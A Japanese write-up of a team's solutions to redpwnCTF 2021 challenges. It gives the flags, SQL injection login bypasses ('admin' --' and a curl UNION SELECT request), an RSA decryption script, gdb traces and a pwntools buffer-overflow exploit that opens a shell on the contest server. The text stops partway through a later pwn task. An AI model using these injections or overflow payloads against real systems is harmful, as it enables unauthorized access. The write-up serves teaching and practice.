redpwnCTF 2021 Writeup

この大会は2021/7/10 4:00(JST)~2021/7/13 4:00(JST)に開催されました。
今回もチームで参戦。結果は 2341点で1418チーム中52位でした。
自分で解けた問題をWriteupとして書いておきます。

sanity-check (misc)

問題にフラグが書いてあった。

flag{1_l0v3_54n17y_ch3ck_ch4ll5}

discord (misc)

Discordに入り、#rulesチャネルのトピックを見ると、フラグが書いてあった。

flag{chall3n63_au7h0r5h1p_1nfl4710n}

inspect-me (web)

HTMLソースを見ると、コメントにフラグが書いてあった。

  <!-- flag{inspect_me_like_123} -->
flag{inspect_me_like_123}

compliant-lattice-feline (misc)

ncで接続するだけ。

$ nc mc.ax 31443
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}

scissor (crypto)

暗号を見るだけでも推測できるが、添付のスクリプトからシーザー暗号になっていることがわかる。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 12:
surround_this_flag_with_flag_format
flag{surround_this_flag_with_flag_format}

orm-bad (web)

Usernameが"admin"でログインできれば、フラグが表示される。SQLインジェクション。以下のように入力して、ログインすると、フラグが表示された。

Username: admin' --
Password: (空)
flag{sqli_overused_again_0b4f6}

wstrings (rev)

$ gdb -q ./wstrings
Reading symbols from ./wstrings...(no debugging symbols found)...done.
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x55555555481a (<main>:	push   rbp)
RBX: 0x0 
RCX: 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RDX: 0x7fffffffdf38 --> 0x7fffffffe27a ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
RDI: 0x1 
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RIP: 0x55555555481e (<main+4>:	sub    rsp,0x150)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x555555554710 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554815 <frame_dummy+5>:	
    jmp    0x555555554780 <register_tm_clones>
   0x55555555481a <main>:	push   rbp
   0x55555555481b <main+1>:	mov    rbp,rsp
=> 0x55555555481e <main+4>:	sub    rsp,0x150
   0x555555554825 <main+11>:	mov    rax,QWORD PTR fs:0x28
   0x55555555482e <main+20>:	mov    QWORD PTR [rbp-0x8],rax
   0x555555554832 <main+24>:	xor    eax,eax
   0x555555554834 <main+26>:	lea    rdi,[rip+0x185]        # 0x5555555549c0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
0008| 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0016| 0x7fffffffde50 --> 0x1 
0024| 0x7fffffffde58 --> 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
0032| 0x7fffffffde60 --> 0x100008000 
0040| 0x7fffffffde68 --> 0x55555555481a (<main>:	push   rbp)
0048| 0x7fffffffde70 --> 0x0 
0056| 0x7fffffffde78 --> 0xdec3a62e07b837fc 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x000055555555481e in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
   0x000055555555481a <+0>:	push   rbp
   0x000055555555481b <+1>:	mov    rbp,rsp
=> 0x000055555555481e <+4>:	sub    rsp,0x150
   0x0000555555554825 <+11>:	mov    rax,QWORD PTR fs:0x28
   0x000055555555482e <+20>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000555555554832 <+24>:	xor    eax,eax
   0x0000555555554834 <+26>:	lea    rdi,[rip+0x185]        # 0x5555555549c0
   0x000055555555483b <+33>:	mov    eax,0x0
   0x0000555555554840 <+38>:	call   0x5555555546f0 <wprintf@plt>
   0x0000555555554845 <+43>:	mov    rdx,QWORD PTR [rip+0x2007e4]        # 0x555555755030 <stdin@@GLIBC_2.2.5>
   0x000055555555484c <+50>:	lea    rax,[rbp-0x150]
   0x0000555555554853 <+57>:	mov    esi,0x50
   0x0000555555554858 <+62>:	mov    rdi,rax
   0x000055555555485b <+65>:	call   0x5555555546c0 <fgetws@plt>
   0x0000555555554860 <+70>:	mov    rax,QWORD PTR [rip+0x2007a9]        # 0x555555755010 <flag>
   0x0000555555554867 <+77>:	lea    rdx,[rbp-0x150]
   0x000055555555486e <+84>:	mov    rsi,rdx
   0x0000555555554871 <+87>:	mov    rdi,rax
   0x0000555555554874 <+90>:	call   0x5555555546b0 <wcscmp@plt>
   0x0000555555554879 <+95>:	test   eax,eax
   0x000055555555487b <+97>:	jne    0x555555554893 <main+121>
   0x000055555555487d <+99>:	mov    rax,QWORD PTR [rip+0x20079c]        # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x0000555555554884 <+106>:	mov    rsi,rax
   0x0000555555554887 <+109>:	lea    rdi,[rip+0x1ea]        # 0x555555554a78
   0x000055555555488e <+116>:	call   0x5555555546e0 <fputws@plt>
   0x0000555555554893 <+121>:	mov    eax,0x0
   0x0000555555554898 <+126>:	mov    rcx,QWORD PTR [rbp-0x8]
   0x000055555555489c <+130>:	xor    rcx,QWORD PTR fs:0x28
   0x00005555555548a5 <+139>:	je     0x5555555548ac <main+146>
   0x00005555555548a7 <+141>:	call   0x5555555546d0 <__stack_chk_fail@plt>
   0x00005555555548ac <+146>:	leave  
   0x00005555555548ad <+147>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000555555554874★比較部分にブレークポイント
Breakpoint 2 at 0x555555554874
gdb-peda$ c
Continuing.
Welcome to flag checker 1.0.
Give me a flag> hoge

[----------------------------------registers-----------------------------------]
RAX: 0x555555554938 --> 0x6c00000066 ('f')
RBX: 0x0 
RCX: 0x1 
RDX: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RSI: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RDI: 0x555555554938 --> 0x6c00000066 ('f')
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RIP: 0x555555554874 (<main+90>:	call   0x5555555546b0 <wcscmp@plt>)
R8 : 0x555555757aa4 --> 0x0 
R9 : 0x7fffffffdb48 --> 0x7fffffffdb60 --> 0x1000 
R10: 0x4 
R11: 0x4 
R12: 0x555555554710 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554867 <main+77>:	lea    rdx,[rbp-0x150]
   0x55555555486e <main+84>:	mov    rsi,rdx
   0x555555554871 <main+87>:	mov    rdi,rax
=> 0x555555554874 <main+90>:	call   0x5555555546b0 <wcscmp@plt>
   0x555555554879 <main+95>:	test   eax,eax
   0x55555555487b <main+97>:	jne    0x555555554893 <main+121>
   0x55555555487d <main+99>:	
    mov    rax,QWORD PTR [rip+0x20079c]        # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x555555554884 <main+106>:	mov    rsi,rax
Guessed arguments:
arg[0]: 0x555555554938 --> 0x6c00000066 ('f')
arg[1]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
arg[2]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcf0 --> 0x6f00000068 ('h')
0008| 0x7fffffffdcf8 --> 0x6500000067 ('g')
0016| 0x7fffffffdd00 --> 0xa ('\n')
0024| 0x7fffffffdd08 --> 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0032| 0x7fffffffdd10 --> 0x7fffffffde80 --> 0x555555554710 (<_start>:	xor    ebp,ebp)
0040| 0x7fffffffdd18 --> 0x7ffff7ffe710 --> 0x7ffff7ffb000 (jg     0x7ffff7ffb047)
0048| 0x7fffffffdd20 --> 0x0 
0056| 0x7fffffffdd28 --> 0x7ffff7dde39f (<_dl_lookup_symbol_x+319>:	add    rsp,0x30)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x0000555555554874 in main ()
gdb-peda$ x/s $rax
0x555555554938:	"f"
gdb-peda$ x/100s $rax
0x555555554938:	"f"
0x55555555493a:	""
0x55555555493b:	""
0x55555555493c:	"l"
0x55555555493e:	""
0x55555555493f:	""
0x555555554940:	"a"
0x555555554942:	""
0x555555554943:	""
0x555555554944:	"g"
0x555555554946:	""
0x555555554947:	""
0x555555554948:	"{"
0x55555555494a:	""
0x55555555494b:	""
0x55555555494c:	"n"
0x55555555494e:	""
0x55555555494f:	""
0x555555554950:	"0"
0x555555554952:	""
0x555555554953:	""
0x555555554954:	"t"
0x555555554956:	""
0x555555554957:	""
0x555555554958:	"_"
0x55555555495a:	""
0x55555555495b:	""
0x55555555495c:	"a"
0x55555555495e:	""
0x55555555495f:	""
0x555555554960:	"l"
0x555555554962:	""
0x555555554963:	""
0x555555554964:	"1"
0x555555554966:	""
0x555555554967:	""
0x555555554968:	"_"
0x55555555496a:	""
0x55555555496b:	""
0x55555555496c:	"s"
0x55555555496e:	""
0x55555555496f:	""
0x555555554970:	"t"
0x555555554972:	""
0x555555554973:	""
0x555555554974:	"r"
0x555555554976:	""
0x555555554977:	""
0x555555554978:	"1"
0x55555555497a:	""
0x55555555497b:	""
0x55555555497c:	"n"
0x55555555497e:	""
0x55555555497f:	""
0x555555554980:	"g"
0x555555554982:	""
0x555555554983:	""
0x555555554984:	"s"
0x555555554986:	""
0x555555554987:	""
0x555555554988:	"_"
0x55555555498a:	""
0x55555555498b:	""
0x55555555498c:	"a"
0x55555555498e:	""
0x55555555498f:	""
0x555555554990:	"r"
0x555555554992:	""
0x555555554993:	""
0x555555554994:	"3"
0x555555554996:	""
0x555555554997:	""
0x555555554998:	"_"
0x55555555499a:	""
0x55555555499b:	""
0x55555555499c:	"s"
0x55555555499e:	""
0x55555555499f:	""
0x5555555549a0:	"k"
0x5555555549a2:	""
0x5555555549a3:	""
0x5555555549a4:	"1"
0x5555555549a6:	""
0x5555555549a7:	""
0x5555555549a8:	"n"
0x5555555549aa:	""
0x5555555549ab:	""
0x5555555549ac:	"n"
0x5555555549ae:	""
0x5555555549af:	""
0x5555555549b0:	"y"
0x5555555549b2:	""
0x5555555549b3:	""
0x5555555549b4:	"}"
0x5555555549b6:	""
0x5555555549b7:	""
0x5555555549b8:	""
0x5555555549b9:	""
0x5555555549ba:	""
0x5555555549bb:	""

レジスタRAXのアドレス以降に入っている文字を連結する。

flag{n0t_al1_str1ngs_ar3_sk1nny}

baby (crypto)

RSA暗号。nをfactordbで素因数分解する。

n = 228430203128652625114739053365339856393
  = 12546190522253739887 * 18207136478875858439

あとはそのまま復号する。

from Crypto.Util.number import *

n = 228430203128652625114739053365339856393
e = 65537
c = 126721104148692049427127809839057445790
p = 12546190522253739887
q = 18207136478875858439

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)

flag = long_to_bytes(m)
print flag
flag{68ab82df34}

secure (web)

スクリプトからログインできたらフラグが表示されることがわかる。

$ curl -X POST -d 'username=admin&password=a' https://secure.mc.ax/login
Found. Redirecting to /?message=Incorrect%20username%20or%20password.%20Query:%20SELECT%20id%20FROM%20users%20WHERE%0A%20%20%20%20%20%20%20%20%20%20username%20=%20'admin'%20AND%0A%20%20%20%20%20%20%20%20%20%20password%20=%20'a';

URLデコードする。

/?message=Incorrect username or password. Query: SELECT id FROM users WHERE
          username = 'admin' AND
          password = 'a';

クエリがわかる。SQL文の途中に改行があるため、passwordの行でコメントを使って、SQLインジェクションを行う。

$ curl -X POST -d "username=admin&password=' UNION SELECT 1 --" https://secure.mc.ax/login
Found. Redirecting to /?message=flag%7B50m37h1n6_50m37h1n6_cl13n7_n07_600d%7D
flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d}

beginner-generic-pwn-number-0 (pwn)

BOFでinspirational_message_indexを上書き、-1になるようにする。

$ file beginner-generic-pwn-number-0 
beginner-generic-pwn-number-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=954a4064a32902a83a98f211211c5eafdef2b3c0, for GNU/Linux 3.2.0, not stripped

$ gdb -q ./beginner-generic-pwn-number-0
Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done.
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x4011f6 (<main>:	endbr64)
RBX: 0x0 
RCX: 0x4012c0 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
RDI: 0x1 
RBP: 0x4012c0 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x4011f6 (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ec <__do_global_dtors_aux+44>:	nop    DWORD PTR [rax+0x0]
   0x4011f0 <frame_dummy>:	endbr64 
   0x4011f4 <frame_dummy+4>:	jmp    0x401180 <register_tm_clones>
=> 0x4011f6 <main>:	endbr64 
   0x4011fa <main+4>:	push   rbp
   0x4011fb <main+5>:	mov    rbp,rsp
   0x4011fe <main+8>:	sub    rsp,0x30
   0x401202 <main+12>:	mov    edi,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0008| 0x7fffffffde20 --> 0x1 
0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
0024| 0x7fffffffde30 --> 0x100008000 
0032| 0x7fffffffde38 --> 0x4011f6 (<main>:	endbr64)
0040| 0x7fffffffde40 --> 0x0 
0048| 0x7fffffffde48 --> 0xdf4a7506815ae20d 
0056| 0x7fffffffde50 --> 0x401110 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004011f6 in main ()
gdb-peda$ b main
Breakpoint 2 at 0x4011f6
gdb-peda$ q
ctf@ctf-virtual-machine:/mnt/hgfs/Shared$ gdb -q ./beginner-generic-pwn-number-0
Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done.
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x4011f6 (<main>:	endbr64)
RBX: 0x0 
RCX: 0x4012c0 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
RDI: 0x1 
RBP: 0x4012c0 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x4011f6 (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ec <__do_global_dtors_aux+44>:	nop    DWORD PTR [rax+0x0]
   0x4011f0 <frame_dummy>:	endbr64 
   0x4011f4 <frame_dummy+4>:	jmp    0x401180 <register_tm_clones>
=> 0x4011f6 <main>:	endbr64 
   0x4011fa <main+4>:	push   rbp
   0x4011fb <main+5>:	mov    rbp,rsp
   0x4011fe <main+8>:	sub    rsp,0x30
   0x401202 <main+12>:	mov    edi,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0008| 0x7fffffffde20 --> 0x1 
0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
0024| 0x7fffffffde30 --> 0x100008000 
0032| 0x7fffffffde38 --> 0x4011f6 (<main>:	endbr64)
0040| 0x7fffffffde40 --> 0x0 
0048| 0x7fffffffde48 --> 0x2c813c5a2d2779ff 
0056| 0x7fffffffde50 --> 0x401110 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004011f6 in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
=> 0x00000000004011f6 <+0>:	endbr64 
   0x00000000004011fa <+4>:	push   rbp
   0x00000000004011fb <+5>:	mov    rbp,rsp
   0x00000000004011fe <+8>:	sub    rsp,0x30
   0x0000000000401202 <+12>:	mov    edi,0x0
   0x0000000000401207 <+17>:	mov    eax,0x0
   0x000000000040120c <+22>:	call   0x4010e0 <time@plt>
   0x0000000000401211 <+27>:	mov    edi,eax
   0x0000000000401213 <+29>:	call   0x4010d0 <srand@plt>
   0x0000000000401218 <+34>:	call   0x401100 <rand@plt>
   0x000000000040121d <+39>:	cdqe   
   0x000000000040121f <+41>:	and    eax,0x1
   0x0000000000401222 <+44>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401226 <+48>:	mov    rax,QWORD PTR [rip+0x2e53]        # 0x404080 <stdout@@GLIBC_2.2.5>
   0x000000000040122d <+55>:	mov    esi,0x0
   0x0000000000401232 <+60>:	mov    rdi,rax
   0x0000000000401235 <+63>:	call   0x4010b0 <setbuf@plt>
   0x000000000040123a <+68>:	mov    rax,QWORD PTR [rip+0x2e4f]        # 0x404090 <stdin@@GLIBC_2.2.5>
   0x0000000000401241 <+75>:	mov    esi,0x0
   0x0000000000401246 <+80>:	mov    rdi,rax
   0x0000000000401249 <+83>:	call   0x4010b0 <setbuf@plt>
   0x000000000040124e <+88>:	mov    rax,QWORD PTR [rip+0x2e4b]        # 0x4040a0 <stderr@@GLIBC_2.2.5>
   0x0000000000401255 <+95>:	mov    esi,0x0
   0x000000000040125a <+100>:	mov    rdi,rax
   0x000000000040125d <+103>:	call   0x4010b0 <setbuf@plt>
   0x0000000000401262 <+108>:	mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401266 <+112>:	lea    rdx,[rax*8+0x0]
   0x000000000040126e <+120>:	lea    rax,[rip+0x2deb]        # 0x404060 <inspirational_messages>
   0x0000000000401275 <+127>:	mov    rax,QWORD PTR [rdx+rax*1]
   0x0000000000401279 <+131>:	mov    rdi,rax
   0x000000000040127c <+134>:	call   0x4010a0 <puts@plt>
   0x0000000000401281 <+139>:	lea    rdi,[rip+0xec8]        # 0x402150
   0x0000000000401288 <+146>:	call   0x4010a0 <puts@plt>
   0x000000000040128d <+151>:	lea    rdi,[rip+0xf1c]        # 0x4021b0
   0x0000000000401294 <+158>:	call   0x4010a0 <puts@plt>
   0x0000000000401299 <+163>:	lea    rax,[rbp-0x30]
   0x000000000040129d <+167>:	mov    rdi,rax
   0x00000000004012a0 <+170>:	call   0x4010f0 <gets@plt>
   0x00000000004012a5 <+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x00000000004012aa <+180>:	jne    0x4012b8 <main+194>
   0x00000000004012ac <+182>:	lea    rdi,[rip+0xf35]        # 0x4021e8
   0x00000000004012b3 <+189>:	call   0x4010c0 <system@plt>
   0x00000000004012b8 <+194>:	mov    eax,0x0
   0x00000000004012bd <+199>:	leave  
   0x00000000004012be <+200>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004012a5
Breakpoint 2 at 0x4012a5
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
"&#120365;&#120358;&#120373;&#120372; &#120355;&#120371;&#120358;&#120354;&#120364; &#120373;&#120361;&#120358; &#120373;&#120371;&#120354;&#120357;&#120362;&#120373;&#120362;&#120368;&#120367; &#120368;&#120359; &#120365;&#120354;&#120372;&#120373; &#120366;&#120362;&#120367;&#120374;&#120373;&#120358; &#120356;&#120361;&#120354;&#120365;&#120365; &#120376;&#120371;&#120362;&#120373;&#120362;&#120367;&#120360;"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad208b 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a 
RDI: 0x0 
RBP: 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RSP: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x4012a5 (<main+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3 
R11: 0x246 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401299 <main+163>:	lea    rax,[rbp-0x30]
   0x40129d <main+167>:	mov    rdi,rax
   0x4012a0 <main+170>:	call   0x4010f0 <gets@plt>
=> 0x4012a5 <main+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x4012aa <main+180>:	jne    0x4012b8 <main+194>
   0x4012ac <main+182>:	lea    rdi,[rip+0xf35]        # 0x4021e8
   0x4012b3 <main+189>:	call   0x4010c0 <system@plt>
   0x4012b8 <main+194>:	mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffdde8 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffddf0 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde00 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffde18 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x00000000004012a5 in main ()
gdb-peda$ patto bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL★RBP
bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 48

RBP-0x8のアドレスにある値と比較しているので、40バイトの後0xffffffffffffffffをセットすればよい。

from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31199)
else:
    p = process('./beginner-generic-pwn-number-0')

payload = 'A' * 40
payload += p64(0xffffffffffffffff)

data = p.recvline().rstrip()
print data
data = p.recvline().rstrip()
print data
data = p.recvline().rstrip()
print data
print payload
p.sendline(payload)
p.interactive()

実行結果は以下の通り。

[+] Opening connection to mc.ax on port 31199: Done
"&#120365;&#120358;&#120373;&#120372; &#120355;&#120371;&#120358;&#120354;&#120364; &#120373;&#120361;&#120358; &#120373;&#120371;&#120354;&#120357;&#120362;&#120373;&#120362;&#120368;&#120367; &#120368;&#120359; &#120365;&#120354;&#120372;&#120373; &#120366;&#120362;&#120367;&#120374;&#120373;&#120358; &#120356;&#120361;&#120354;&#120365;&#120365; &#120376;&#120371;&#120362;&#120373;&#120362;&#120367;&#120360;"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}

ret2generic-flag-reader (pwn)

BOFでsuper_generic_flag_reading_function_please_ret_to_me関数に飛ばすようにする。

$ file ret2generic-flag-reader 
ret2generic-flag-reader: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c749a16c9546cfe2cab694374c7d003c2bbb52f3, for GNU/Linux 3.2.0, not stripped

$ gdb -q ./ret2generic-flag-reader
Reading symbols from ./ret2generic-flag-reader...(no debugging symbols found)...done.
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010a0  puts@plt
0x00000000004010b0  fclose@plt
0x00000000004010c0  setbuf@plt
0x00000000004010d0  fgets@plt
0x00000000004010e0  gets@plt
0x00000000004010f0  fopen@plt
0x0000000000401100  exit@plt
0x0000000000401110  _start
0x0000000000401140  _dl_relocate_static_pie
0x0000000000401150  deregister_tm_clones
0x0000000000401180  register_tm_clones
0x00000000004011c0  __do_global_dtors_aux
0x00000000004011f0  frame_dummy
0x00000000004011f6  super_generic_flag_reading_function_please_ret_to_me
0x00000000004013a5  main
0x0000000000401430  __libc_csu_init
0x00000000004014a0  __libc_csu_fini
0x00000000004014a8  _fini
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x4013a5 (<main>:	endbr64)
RBX: 0x0 
RCX: 0x401430 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffdf18 --> 0x7fffffffe26b ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
RDI: 0x1 
RBP: 0x401430 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x4013a5 (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdf00 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4013a2 <super_generic_flag_reading_function_please_ret_to_me+428>:	nop
   0x4013a3 <super_generic_flag_reading_function_please_ret_to_me+429>:	
    leave  
   0x4013a4 <super_generic_flag_reading_function_please_ret_to_me+430>:	
    ret    
=> 0x4013a5 <main>:	endbr64 
   0x4013a9 <main+4>:	push   rbp
   0x4013aa <main+5>:	mov    rbp,rsp
   0x4013ad <main+8>:	sub    rsp,0x20
   0x4013b1 <main+12>:	
    mov    rax,QWORD PTR [rip+0x2ca8]        # 0x404060 <stdout@@GLIBC_2.2.5>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0008| 0x7fffffffde30 --> 0x1 
